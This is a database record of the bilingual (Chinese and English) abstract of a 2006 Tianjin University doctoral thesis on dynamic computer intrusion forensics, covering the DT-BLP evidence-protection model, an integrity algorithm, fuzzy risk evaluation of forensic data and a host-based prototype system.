【作者】 綦朝晖；

【导师】 孙济洲；

【作者基本信息】 天津大学 ， 计算机应用技术， 2006， 博士

【摘要】 近年来,计算机网络犯罪案件急剧上升,计算机网络犯罪已经成为普遍的国际性问题。而打击计算机网络犯罪的关键是找到充分、可靠、具有法律效力的电子证据。因此,计算机取证(computer forensics)受到了越来越多的关注,并成为计算机网络安全领域的研究热点。本文对计算机入侵取证领域中的几个关键问题进行了深入的研究。文中首先全面讨论计算机数据作为合法证据的相关法律问题,之后对计算机取证研究的发展现状进行全面综述,并从全新的角度——静态和动态两种不同的视角对计算机取证现状进行分析和归纳。在此基础上,总结了针对入侵前和入侵过程中进行犯罪证据安全转移的动态取证思想。并指出,好的计算机取证方法,应该是实时地安全保护好可能的犯罪证据,并在事发后进行具体的调查取证。取证信息安全保护理论模型(DT-BLP安全模型)及其实际应用方案的提出,为取证信息安全保护系统的设计与开发提供了理论指导和应用基础,使得在入侵前和入侵过程中进行犯罪证据的安全保护成为可能,极大地减少了入侵者在入侵前和入侵过程中进行其犯罪证据破坏的可能性。计算机数据的完整性问题一直是计算机犯罪证据鉴定过程中的难点所在,文中所提出的取证信息一致性算法能够成功地对入侵前、入侵中的取证信息完整性进行严格的技术保护。随着时间的推移,取证系统中所收集的取证信息量将会越积越多,但是,其真正的入侵犯罪证据可能只占极少的比例(尽管比例很小,却是至关重要的),因此,必须对占较大比例的正常信息进行筛选删除,以便长时间保留那些可能的犯罪证据。为此,论文提出了取证信息风险的模糊评价算法,对所有取证信息进行风险评价,并进行选择。论文最后介绍了融合前述研究成果的软件原型系统——基于主机的动态取证原型系统的设计与实现步骤,阐述了该原型系统在开发流程中的功能需求分析和详细设计方案,并对系统进行性能评价。更多还原

【Abstract】 Recently, network crime is rising so rapidly, and it has become an international issue. It is a practicable solution to find out enough electronic testimonies with credibility and legitimacy. This is computer forensics. Today, people attach more and more importance to computer forensics. The research for computer forensics has been an important part of computer security.Computer digital information such as 0 or 1 is easily modified. The weak characteristic results in the difficulty in judging computer testimonies. In this paper the law problems relative to legal computer testimonies are firstly discussed. Then we richly analyze and fully summarize the research productions in the field, according to the two different methods: static way and dynamic way. Based on the analysis and the summarization, a new computer forensics thinking, which should be able to transfer in time the computer crime testimonies to another safety place, is suggested.Then a safety theory model called DT-BLP safety model is discussed. The application of the model to computer forensics is presented. The application can protect in time the computer testimonies against the hacker’s destroying, especially in the initial stage of the hacker’s intrusion and in the process of the intrusion.The integrality problem of computer testimonies is a difficult one in identifying computer crime. In this paper, an information integrality algorithm is presented. The algorithm can protect the integrality of computer testimonies against the hacker’s destroying.The total amount of computer forensics information becomes larger and larger when the computer is running. However, the amount of the crime testimonies reflecting the hacker’s intrusion behavior is little. The most normal information should be removed at proper moment. The crime testimonies should be kept as longer as possible. In the paper, we proposed a fuzzy evaluation algorithm dealing with the information risk about computer forensics information. Then according to the evaluation results, the potential crime information reflecting the hacker’s intrusion behavior is hold.Finally, we proposed a dynamic computer forensics system based on host computer, and estimate its performance.更多还原